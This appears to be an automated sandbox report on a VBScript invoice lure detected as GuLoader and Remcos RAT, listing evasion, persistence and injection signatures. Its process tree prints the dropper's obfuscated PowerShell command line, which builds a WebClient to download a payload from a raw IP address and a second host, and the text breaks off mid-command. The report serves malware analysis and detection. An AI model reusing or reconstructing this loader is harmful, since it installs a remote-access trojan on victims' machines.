Windows
Analysis Report
Revised Invoice 7389293.vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6952 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Revis ed Invoice 7389293.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 6348 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Relinqui shments Mi ddelvejen Oksehalens Sekstenaa rsfdselsda gens Trans ceive2 Bew ailment Pr mielaanets opbyggend es Kulturu dbuddets15 6 helliggj ordes disr ates Corro sible lady bug Opvikl e Udvalgsp rocedurens 191 Eutaxi es Anaphor a Radierer Testatore rnes Opteg nelsesbger Ministran t187 Algum s Indberet ningspligt er Wakerob in Relinqu ishments M iddelvejen Oksehalen s Sekstena arsfdselsd agens Tran sceive2 Be wailment P rmielaanet s opbyggen des Kultur udbuddets1 56 helligg jordes dis rates Corr osible lad ybug Opvik le Udvalgs proceduren s191 Eutax ies Anapho ra Radiere r Testator ernes Opte gnelsesbge r Ministra nt187 Algu ms Indbere tningsplig ter Wakero bin';If ($ {host}.Cur rentCultur e) {$Cucul idae++;}Fu nction Gly cosemia205 ($Drfyldin gernes){$F olkloric=$ Drfyldinge rnes.Lengt h-$Cuculid ae;$Decalv ant='SUBsT RI';$Decal vant+='ng' ;For( $Fri tures=1;$F ritures -l t $Folklor ic;$Fritur es+=2){$Re linquishme nts+=$Drfy ldingernes .$Decalvan t.Invoke( $Fritures, $Cuculida e);}$Relin quishments ;}function Eksistens minimas($R ettesnoren e){ &($Pro sadigtene) ($Rettesn orene);}$s ignallygte ns=Glycose mia205 'AM .o z i l.l Ra./ 5U. 0 , b( Wsi.n Ed o w s, ,NdT. 1C0M . 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2 G1 . 0n). AG,e cOk o S/ 2 0 1 0 ,0 1A0R1. ,F itrMerf So,xO/ 1M2 1 .A0F '; $Millihg=G lycosemia2 05 ' UCs e or - A,gDe .nFt ';$Tr ansceive2= Glycosemia 205 'sh,t t pD: /S/N 1 0 3 ..1F 9E5 .U2 3N 7S. 4.3,/ N y.e t .K qOxFdS> h tAt.pSsE:P /,/Tm,i l aDn aRcOe. sA.Cc,o,m / N,y.e t ..qAxEdv ' ;$Mellemli ggende=Gly cosemia205 ',>. ';$P rosadigten e=Glycosem ia205 'DiA eSx ';$Dis tendedly=' opbyggende s';$Tilbag eholdelses = Glycose mia205 'ce .c,hMoU S% ,aRp.pKd a RtDaS%s\ s .tBa,l lLm aUnP. FAr BoN &C&K I eOcEhco St ';Eksiste nsminimas (Glycosemi a205 'D$ g .lHoEbSaNl P:SP a.rua ,l l e lRe Vd =.( cSm Td ./Uc $ GT,i l,b a Bg e.h o,l Pd.e.l s.e FsS)H ');E ksistensmi nimas (Gly cosemia205 'U$igIlSo bSaAl :US Ue.kUsLtMe UnHa,a rBs Cf,dSsFeel fs d.aIgZe unMsH=p$,T ArUa.nAs,c UePi.v e.2 .Os,p.l,i ,tI(H$UM e .lPlDePm.l .iBg.gFeVn d eT)I ') ;Eksistens minimas (G lycosemia2 05 ' [ N e .t,.oSAe.r v iRcEe.P Do iUn t M Fa,n a,g e Ir ]L:K: S e.c uFrfi t y PSrNo StCoScBo,l =s M[ NR e.tU..SSe, c u rTi t y,PSrDo tG oHcPoClrT, yBpAeF] :A :CT.lOs 1D 2 ');$Tran sceive2=$S ekstenaars fdselsdage ns[0];$Lot har= (Glyc osemia205 'A$,gfl o b aUl :,D i s eJnLtT e.r =VNNeR w - O.bRj. eBc tC S y ,s t e,mI. AN.e tk. W TeIb,CFl.i le,n t');$ Lothar+=$P aralleled[ 1];Eksiste nsminimas ($Lothar); Eksistensm inimas (Gl ycosemia20 5 'S$DDRiC sDeTnGt.e rS. HPeRaN d eSrKs [C